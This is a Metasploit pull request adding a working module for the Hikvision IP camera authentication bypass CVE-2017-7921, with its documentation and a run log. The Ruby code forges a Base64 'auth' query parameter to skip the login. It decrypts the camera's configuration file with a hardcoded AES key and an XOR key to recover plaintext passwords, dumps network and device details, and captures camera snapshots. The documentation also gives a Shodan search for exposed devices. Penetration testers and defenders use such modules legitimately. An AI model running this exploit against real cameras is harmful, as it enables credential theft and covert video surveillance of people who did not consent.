### PR TITLE
Hikvision camera unauthenticated information disclosure

### DIFF
--- a/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
@@ -1,0 +1,168 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure
+of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.
+
+This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
+improper authentication logic to send a request to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `password` parameter and will instead use the username part of this string
+as the user to log in. Using user `admin` will allow an attacker to retrieve and disclosed any information
+of the targetted device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled
+camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+## Verification Steps
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+1. `use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `check`
+1. `set PRINT true`
+1. `set ACTION Automatic`
+1. `run`
+1. You should get a full disclosure of all camera information supported by this module.
+
+## Options
+### PRINT
+This option allows you print all information collected to the console during execution except for
+camera snapshots.
+
+## Actions
+### Automatic
+Retrieves all information suported by this module
+### Configuration
+Retrieves the camera hardware and software configuration
+### Credentials
+Retrieves all configured users including the passwords in plain text format and stores them in the database.
+This can be checked by using the command `creds -O <target IP>` at the Metasploit prompt.
+### Snapshot
+Takes a camera snapshot and stores it as a JPEG file in loot.
+
+All information disclosed is by default stored in loot
+
+## Scenarios
+
+### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
+
+```
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set ACTION Automatic
+ACTION => Automatic
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set PRINT true
+PRINT => true
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > options
+
+Module options (auxiliary/gather/hikvision_info_disclosure_cve_2017_7921):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   PRINT    true             no        Print output to console (not applicable for snapshot)
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name       Description
+   ----       -----------
+   Automatic  Dump all information
+
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > check
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Running in automatic mode
+[*] Getting the user credentials...
+[*] Credentials for user:admin are added to the database...
+[*] Credentials for user:admln are added to the database...
+[*] User Credentials Information:
+-----------------------------
+Username:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
+Username:admln | ID:2 | Role:Operator | Password: asdf1234
+
+[+] User credentials are successfully saved to /root/.msf4/loot/20221002172346_default_192.168.100.180_hikvision.creden_049224.txt
+[*] Getting the camera hardware and software configuration...
+[*] Camera Device Information:
+--------------------------
+Device name: IP CAMERA
+Device ID: 88
+Device description: IPCamera
+Device manufacturer: Hikvision.China
+Device model: DS-2CD2142FWD-IS
+Device S/N: DS-2CD2142FWD-IS20160627BBWR616855101
+Device MAC: bc:ad:28:ff:ff:ff
+Device firware version: V5.4.1
+Device firmware release: build 160525
+Device boot version: V1.3.4
+Device boot release: 100316
+Device hardware version: 0x0
+
+Camera Network Information:
+---------------------------
+IP interface: 1
+IP version: v4
+IP assignment: static
+IP address: 192.168.100.180
+IP subnet mask: 255.255.255.0
+Default gateway: 192.168.100.1
+Primary DNS: 8.8.8.8
+
+Camera Storage Information:
+---------------------------
+Storage volume name: HDD1
+Storage volume ID: 1
+Storage volume description: DAS
+Storage device: HDD
+Storage type: internal
+Storage capacity (MB): 30543
+Storage device status: HD_NORMAL
+
+[+] Camera configuration details are successfully saved to /root/.msf4/loot/20221002172347_default_192.168.100.180_hikvision.config_549113.txt
+[*] Taking a camera snapshot...
+[+] Camera snapshot is successfully saved to /root/.msf4/loot/20221002172348_default_192.168.100.180_hikvision.image_963468.bin
+[*] Auxiliary module execution completed
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admln   asdf1234         Password
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) >
+```
+
+## Limitations
+No limitations are identified so far using this module.

--- a/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
+++ b/documentation/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.md
@@ -7,12 +7,11 @@ This module allows the attacker to disclose this information without the need of
 improper authentication logic to send a request to the server which contains an `auth` parameter in the query string
 containing a Base64 encoded version of the authorization in `username:password` format.
 Vulnerable cameras will ignore the `password` parameter and will instead use the username part of this string
-as the user to log in. Using user `admin` will allow an attacker to retrieve and disclosed any information
-of the targetted device.
+as the user to log in. Using user `admin` will allow an attacker to retrieve and disclose any information
+of the targeted device.
 
 The vulnerability has been present in Hikvision products since 2014.
-In addition to Hikvision-branded devices, it affects many white-labeled
-camera products sold under a variety of brand names.
+In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
 
 Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
 
@@ -66,7 +65,7 @@ All information disclosed is by default stored in loot
 
 ## Scenarios
 
-### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
+### Hikvision Camera DS-2CD2142FWD-IS -> firmware version V5.4.1, build 160525
 
 ```
 msf6 auxiliary(gather/hikvision_info_disclosure_cve_2017_7921) > set rhosts 192.168.100.180
@@ -119,7 +118,7 @@ Device ID: 88
 Device description: IPCamera
 Device manufacturer: Hikvision.China
 Device model: DS-2CD2142FWD-IS
-Device S/N: DS-2CD2142FWD-IS20160627BBWR616855101
+Device S/N: DS-2CD2142FWD-IS2016HS77777777777
 Device MAC: bc:ad:28:ff:ff:ff
 Device firware version: V5.4.1
 Device firmware release: build 160525

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -1,0 +1,374 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  require 'openssl'
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Unauthenticated information disclosure such as configuration, credentials and camera snapshots of a vulnerable Hikvision IP Camera',
+        'Description' => %q{
+          Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure of camera information,
+          such as detailed hardware and software configuration, user credentials, and camera snapshots.
+          The vulnerability has been present in Hikvision products since 2014.
+          In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.
+          Hundreds of thousands of vulnerable devices are still exposed to the Internet at the time of publishing (shodan search: "App-webs" "200 OK").
+          This module allows the attacker to retrieve this information without any authentication. The information is stored in loot for future use.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Monte Crypto', # Researcher who discovered and disclosed this vulnerability
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # Developer and author of this Metasploit module
+        ],
+        'References' => [
+          [ 'CVE', '2017-7921' ],
+          [ 'PACKETSTORM', '144097' ],
+          [ 'URL', 'https://ipvm.com/reports/hik-exploit' ],
+          [ 'URL', 'https://attackerkb.com/topics/PlLehGSmxT/cve-2017-7921' ],
+          [ 'URL', 'http://seclists.org/fulldisclosure/2017/Sep/23' ]
+        ],
+        'Actions' => [
+          ['Automatic', { 'Description' => 'Dump all information' }],
+          ['Credentials', { 'Description' => 'Dump all credentials and passwords' }],
+          ['Configuration', { 'Description' => 'Dump camera hardware and software configuration' }],
+          ['Snapshot', { 'Description' => 'Take a camera snapshot' }]
+        ],
+        'DefaultAction' => 'Automatic',
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'DisclosureDate' => '2017-09-23',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options([
+      OptBool.new(
+        'PRINT',
+        [
+          false,
+          'Print output to console (not applicable for snapshot)',
+          true
+        ]
+      )
+    ])
+  end
+
+  def get_info(uri)
+    password = Rex::Text.rand_text_alphanumeric(4..12)
+    auth = Base64.urlsafe_encode64("admin:#{password}", padding: false)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => uri,
+      'vars_get' => {
+        'auth' => auth.strip
+      }
+    })
+    return res
+  rescue StandardError => e
+    print_error("#{peer} - Communication error occurred: #{e.message}")
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    return nil
+  end
+
+  def report_creds(user, pwd)
+    if datastore['SSL'] == true
+      service_proto = 'https'
+    else
+      service_proto = 'http'
+    end
+    service_data = {
+      address: datastore['RHOSTS'],
+      port: datastore['RPORT'],
+      service_name: service_proto,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: user,
+      private_data: pwd,
+      private_type: :password
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_data)
+
+    cred_res = create_credential_login(login_data)
+    unless cred_res.nil?
+      print_status("Credentials for user:#{user} are added to the database...")
+    end
+  end
+
+  def decrypt_config
+    text_data = []
+
+    # Get AES128-ECB encrypted camera configuration file with user and password information
+    uri = normalize_uri(target_uri.path, 'System', 'configurationFile')
+    aes_data = get_info(uri)
+
+    if aes_data.nil?
+      print_error('Target server did not respond to the configuration file download request.')
+    elsif aes_data && aes_data.code == 200
+      # decrypt configuration file data with the weak AES128-ECB encryption hex key: 279977f62f6cfd2d91cd75b889ce0c9a
+      decipher = OpenSSL::Cipher.new('aes-128-ecb')
+      decipher.decrypt
+      decipher.key = ['279977f62f6cfd2d91cd75b889ce0c9a'].pack('H*') # transform hex key to 16 bits key
+      xor_data = decipher.update(aes_data.body) + decipher.final
+
+      # decode the AES decrypted configuration file data with xor key: 73 8B 55 44
+      file_data = Rex::Text.xor("\x73\x8b\x55\x44".b, xor_data)
+
+      # filter out text chunks with regular expression below...
+      text_data = file_data.scan(%r{[0-9A-Za-z_\#~`@|\\/=*\^:"'.;{}?\-+&!$%()\[\]<>]+}x)
+    end
+    return text_data
+  end
+
+  def get_creds
+    loot_data = ''
+    pwd = nil
+
+    uri = normalize_uri(target_uri.path, 'Security', 'users')
+    creds_info = get_info(uri)
+
+    if creds_info.nil?
+      print_error('Target server did not respond to the credentials request.')
+    elsif creds_info && creds_info.code == 200
+      # process XML output and store output in loot_data
+      xml_creds_info = creds_info.get_xml_document
+      if xml_creds_info.blank?
+        print_error('No users were found in the returned CSS code!')
+      else
+        # Download camera configuration file and and decrypt
+        text_data = decrypt_config
+        loot_data << "User Credentials Information:\n"
+        loot_data << "-----------------------------\n"
+        xml_creds_info.css('User').each do |user|
+          unless text_data.nil?
+            # Filter out password based on user name and store credentials in the database
+            i = text_data.each_with_index.select { |text_chunk, _index| text_chunk == user.at_css('userName').content }.map { |pair| pair[1] }
+            pwd = text_data[i.last + 1]
+            report_creds(user.at_css('userName').content, pwd)
+          end
+          loot_data << "Username:#{user.at_css('userName').content} | ID:#{user.at_css('id').content} | Role:#{user.at_css('userLevel').content} | Password: #{pwd}\n"
+        end
+      end
+    else
+      print_error('No response received obtaining the user credentials.')
+    end
+    return loot_data
+  end
+
+  def get_config
+    loot_data = ''
+
+    # Get device info
+    uri = normalize_uri(target_uri.path, 'System', 'deviceInfo')
+    device_info = get_info(uri)
+
+    if device_info.nil?
+      print_error('Target server did not respond to the device info request.')
+    elsif device_info && device_info.code == 200
+      # process XML output and store in loot_data
+      xml_device_info = device_info.get_xml_document
+      if xml_device_info.blank?
+        print_error('No device info was found in the returned CSS code!')
+      else
+        loot_data << "Camera Device Information:\n"
+        loot_data << "--------------------------\n"
+        xml_device_info.css('DeviceInfo').each do |device|
+          loot_data << "Device name: #{device.at_css('deviceName').content}\n"
+          loot_data << "Device ID: #{device.at_css('deviceID').content}\n"
+          loot_data << "Device description: #{device.at_css('deviceDescription').content}\n"
+          loot_data << "Device manufacturer: #{device.at_css('systemContact').content}\n"
+          loot_data << "Device model: #{device.at_css('model').content}\n"
+          loot_data << "Device S/N: #{device.at_css('serialNumber').content}\n"
+          loot_data << "Device MAC: #{device.at_css('macAddress').content}\n"
+          loot_data << "Device firware version: #{device.at_css('firmwareVersion').content}\n"
+          loot_data << "Device firmware release: #{device.at_css('firmwareReleasedDate').content}\n"
+          loot_data << "Device boot version: #{device.at_css('bootVersion').content}\n"
+          loot_data << "Device boot release: #{device.at_css('bootReleasedDate').content}\n"
+          loot_data << "Device hardware version: #{device.at_css('hardwareVersion').content}\n"
+        end
+        loot_data << "\n"
+      end
+    else
+      print_error('No response received obtaining camera hardware and software configuration.')
+    end
+
+    # Get network configuration
+    uri = normalize_uri(target_uri.path, 'Network', 'interfaces')
+    network_info = get_info(uri)
+
+    if network_info.nil?
+      print_error('Target server did not respond to the network info request.')
+    elsif network_info && network_info.code == 200
+      # process XML output and store in loot_data
+      xml_network_info = network_info.get_xml_document
+      if xml_network_info.blank?
+        print_error('No network info was found in the returned CSS code!')
+      else
+        loot_data << "Camera Network Information:\n"
+        loot_data << "---------------------------\n"
+        xml_network_info.css('NetworkInterface').each do |interface|
+          loot_data << "IP interface: #{interface.at_css('id').content}\n"
+          xml_network_info.css('IPAddress').each do |ip|
+            loot_data << "IP version: #{ip.at_css('ipVersion').content}\n"
+            loot_data << "IP assignment: #{ip.at_css('addressingType').content}\n"
+            loot_data << "IP address: #{ip.at_css('ipAddress').content}\n"
+            loot_data << "IP subnet mask: #{ip.at_css('subnetMask').content}\n"
+            xml_network_info.css('DefaultGateway').each do |gateway|
+              loot_data << "Default gateway: #{gateway.at_css('ipAddress').content}\n"
+            end
+            xml_network_info.css('PrimaryDNS').each do |dns|
+              loot_data << "Primary DNS: #{dns.at_css('ipAddress').content}\n"
+            end
+          end
+        end
+        loot_data << "\n"
+      end
+    else
+      print_error('No response received obtaining camera network configuration.')
+    end
+
+    # Get storage configuration
+    uri = normalize_uri(target_uri.path, 'System', 'Storage', 'volumes')
+    storage_info = get_info(uri)
+
+    if storage_info.nil?
+      print_error('Target server did not respond to the storage info request.')
+    elsif storage_info && storage_info.code == 200
+      # process XML output and store in loot
+      xml_storage_info = storage_info.get_xml_document
+      if xml_storage_info.blank?
+        print_error('No storage info was found in the returned CSS code!')
+      else
+        loot_data << "Camera Storage Information:\n"
+        loot_data << "---------------------------\n"
+        xml_storage_info.css('StorageVolume').each do |volume|
+          loot_data << "Storage volume name: #{volume.at_css('volumeName').content}\n"
+          loot_data << "Storage volume ID: #{volume.at_css('id').content}\n"
+          loot_data << "Storage volume description: #{volume.at_css('storageDescription').content}\n"
+          loot_data << "Storage device: #{volume.at_css('storageLocation').content}\n"
+          loot_data << "Storage type: #{volume.at_css('storageType').content}\n"
+          loot_data << "Storage capacity (MB): #{volume.at_css('capacity').content}\n"
+          loot_data << "Storage device status: #{volume.at_css('status').content}\n"
+        end
+      end
+    else
+      print_error('No response received obtaining camera storage configuration.')
+    end
+    return loot_data
+  end
+
+  def take_snapshot
+    jpeg_image = nil
+
+    # Take a snapshot and store as jpeg
+    uri = normalize_uri(target_uri.path, 'Streaming', 'channels', '1', 'picture?snapShotImageType=JPEG')
+    res = get_info(uri)
+
+    if res.nil?
+      print_error('Target server did not respond to the snapshot request.')
+    elsif res && res.code == 200
+      jpeg_image = res.body
+    else
+      print_error('No response received obtaining a camera snapshot.')
+    end
+    return jpeg_image
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'System', 'time')
+    res = get_info(uri)
+
+    if res.nil?
+      return Exploit::CheckCode::Unknown
+    elsif res && res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def run
+    return unless check == Exploit::CheckCode::Vulnerable
+
+    case action.name
+    when 'Automatic'
+      print_status('Running in automatic mode')
+
+      print_status('Getting the user credentials...')
+      creds_loot_data = get_creds
+      unless creds_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(creds_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], creds_loot_data, 'credentials', 'leaked credentials')
+        print_good("User credentials are successfully saved to #{loot_path}")
+      end
+
+      print_status('Getting the camera hardware and software configuration...')
+      config_loot_data = get_config
+      unless config_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(config_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], config_loot_data, 'configuration', 'camera configuration')
+        print_good("Camera configuration details are successfully saved to #{loot_path}")
+      end
+
+      print_status('Taking a camera snapshot...')
+      snapshot_loot_data = take_snapshot
+      unless snapshot_loot_data.nil?
+        loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], snapshot_loot_data, 'snapshot', 'camera snapshot')
+        print_good("Camera snapshot is successfully saved to #{loot_path}")
+      end
+    when 'Credentials'
+      print_status('Getting the user credentials...')
+      creds_loot_data = get_creds
+      unless creds_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(creds_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], creds_loot_data, 'credentials', 'leaked credentials')
+        print_good("User credentials are successfully saved to #{loot_path}")
+      end
+    when 'Configuration'
+      print_status('Getting the camera hardware and software configuration...')
+      config_loot_data = get_config
+      unless config_loot_data.nil?
+        if datastore['PRINT'] == true
+          print_status(config_loot_data.to_s)
+        end
+        loot_path = store_loot('hikvision.config', 'text/plain', datastore['RHOSTS'], config_loot_data, 'configuration', 'camera configuration')
+        print_good("Camera configuration details are successfully saved to #{loot_path}")
+      end
+    when 'Snapshot'
+      print_status('Taking a camera snapshot...')
+      snapshot_loot_data = take_snapshot
+      unless snapshot_loot_data.nil?
+        loot_path = store_loot('hikvision.image', 'jpeg/image', datastore['RHOSTS'], snapshot_loot_data, 'snapshot', 'camera snapshot')
+        print_good("Camera snapshot is successfully saved to #{loot_path}")
+      end
+    end
+  end
+end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -255,7 +255,7 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     else
-      print_error('No response received obtaining camera storage configuration.')
+      print_error('Response code invalid for obtaining camera storage configuration.')
     end
     return loot_data
   end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -283,7 +283,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if res.nil?
       return Exploit::CheckCode::Unknown
-    elsif res && res.code == 200
+    elsif res.code == 200
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Safe

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -269,7 +269,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if res.nil?
       print_error('Target server did not respond to the snapshot request.')
-    elsif res && res.code == 200
+    elsif res.code == 200
       jpeg_image = res.body
     else
       print_error('No response received obtaining a camera snapshot.')

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Auxiliary
     else
       print_error('Response code invalid for obtaining the user credentials.')
     end
-    unless loot_data.nil?
+    if loot_data
       if datastore['PRINT'] == true
         print_status(loot_data.to_s)
       end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if aes_data.nil?
       print_error('Target server did not respond to the configuration file download request.')
-    elsif aes_data && aes_data.code == 200
+    elsif aes_data.code == 200
       # decrypt configuration file data with the weak AES128-ECB encryption hex key: 279977f62f6cfd2d91cd75b889ce0c9a
       decipher = OpenSSL::Cipher.new('aes-128-ecb')
       decipher.decrypt

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if creds_info.nil?
       print_error('Target server did not respond to the credentials request.')
-    elsif creds_info && creds_info.code == 200
+    elsif creds_info.code == 200
       # process XML output and store output in loot_data
       xml_creds_info = creds_info.get_xml_document
       if xml_creds_info.blank?

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
       # decode the AES decrypted configuration file data with xor key: 73 8B 55 44
       file_data = Rex::Text.xor("\x73\x8b\x55\x44".b, xor_data)
 
-      # filter out text chunks with regular expression below...
+      # extract text chunks with regular expression below...
       text_data = file_data.scan(%r{[0-9A-Za-z_\#~`@|\\/=*\^:"'.;{}?\-+&!$%()\[\]<>]+}x)
     end
     return text_data

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -159,7 +159,7 @@ class MetasploitModule < Msf::Auxiliary
       print_error('Response code invalid for obtaining the user credentials.')
     end
     if loot_data
-      if datastore['PRINT'] == true
+      if datastore['PRINT']
         print_status(loot_data.to_s)
       end
       loot_path = store_loot('hikvision.credential', 'text/plain', datastore['RHOSTS'], loot_data, 'credentials', 'leaked credentials')

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -201,7 +201,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if network_info.nil?
       print_error('Target server did not respond to the network info request.')
-    elsif network_info && network_info.code == 200
+    elsif network_info.code == 200
       # process XML output and store in loot_data
       xml_network_info = network_info.get_xml_document
       if xml_network_info.blank?

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -153,7 +153,7 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     else
-      print_error('No response received obtaining the user credentials.')
+      print_error('Response code invalid for obtaining the user credentials.')
     end
     return loot_data
   end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -277,7 +277,7 @@ class MetasploitModule < Msf::Auxiliary
     else
       print_error('Response code invalid for obtaining camera storage configuration.')
     end
-    unless loot_data.nil?
+    unless loot_data.empty?
       if datastore['PRINT']
         print_status(loot_data.to_s)
       end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -168,7 +168,7 @@ class MetasploitModule < Msf::Auxiliary
     else
       print_error('Response code invalid for obtaining the user credentials.')
     end
-    if loot_data
+    unless loot_data.empty?
       if datastore['PRINT']
         print_status(loot_data.to_s)
       end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -192,7 +192,7 @@ class MetasploitModule < Msf::Auxiliary
         loot_data << "\n"
       end
     else
-      print_error('No response received obtaining camera hardware and software configuration.')
+      print_error('Response code invalid for obtaining camera hardware and software configuration.')
     end
 
     # Get network configuration

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -167,7 +167,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if device_info.nil?
       print_error('Target server did not respond to the device info request.')
-    elsif device_info && device_info.code == 200
+    elsif device_info.code == 200
       # process XML output and store in loot_data
       xml_device_info = device_info.get_xml_document
       if xml_device_info.blank?

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -272,7 +272,7 @@ class MetasploitModule < Msf::Auxiliary
     elsif res.code == 200
       jpeg_image = res.body
     else
-      print_error('No response received obtaining a camera snapshot.')
+      print_error('Response code invalid for obtaining a camera snapshot.')
     end
     return jpeg_image
   end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -227,7 +227,7 @@ class MetasploitModule < Msf::Auxiliary
         loot_data << "\n"
       end
     else
-      print_error('No response received obtaining camera network configuration.')
+      print_error('Response code invalid for obtaining camera network configuration.')
     end
 
     # Get storage configuration

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -84,34 +84,15 @@ class MetasploitModule < Msf::Auxiliary
     return nil
   end
 
-  def report_creds(user, pwd)
-    if datastore['SSL'] == true
-      service_proto = 'https'
-    else
-      service_proto = 'http'
-    end
-    service_data = {
-      address: datastore['RHOSTS'],
-      port: datastore['RPORT'],
-      service_name: service_proto,
-      protocol: 'tcp',
-      workspace_id: myworkspace_id
-    }
-
     credential_data = {
-      origin_type: :service,
-      module_fullname: fullname,
-      username: user,
-      private_data: pwd,
-      private_type: :password
-    }.merge(service_data)
-
-    login_data = {
-      core: create_credential(credential_data),
-      status: Metasploit::Model::Login::Status::UNTRIED
-    }.merge(service_data)
-
-    cred_res = create_credential_login(login_data)
+        module_fullname: self.fullname,
+        username: user,
+        private_data: pwd,
+        private_type: :password,
+        workspace_id: myworkspace_id,
+        status: Metasploit::Model::Login::Status::UNTRIED
+    }.merge(service_details)
+    cred_res = create_credential_and_login(credential_data)
     unless cred_res.nil?
       print_status("Credentials for user:#{user} are added to the database...")
     end

--- a/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
+++ b/modules/auxiliary/gather/hikvision_info_disclosure_cve_2017_7921.rb
@@ -236,7 +236,7 @@ class MetasploitModule < Msf::Auxiliary
 
     if storage_info.nil?
       print_error('Target server did not respond to the storage info request.')
-    elsif storage_info && storage_info.code == 200
+    elsif storage_info.code == 200
       # process XML output and store in loot
       xml_storage_info = storage_info.get_xml_document
       if xml_storage_info.blank?


### PR DESCRIPTION
Many Hikvision IP cameras have improper authorization logic that allows unauthenticated information disclosure
of camera information, such as detailed hardware and software configuration, user credentials, and camera snapshots.

This module allows the attacker to disclose this information without the need of authenticaton by utilizing the
improper authentication logic to send a request to the server which contains an `auth` parameter in the query string
containing a Base64 encoded version of the authorization in `username:password` format.
Vulnerable cameras will ignore the `password` parameter and will instead use the username part of this string
as the user to log in. Using user `admin` will allow an attacker to retrieve and disclose any information
of the targeted device.

The vulnerability has been present in Hikvision products since 2014.
In addition to Hikvision-branded devices, it affects many white-labeled camera products sold under a variety of brand names.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use auxiliary/gather/hikvision_info_disclosure_cve_2017_7921`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `set RPORT <port>`
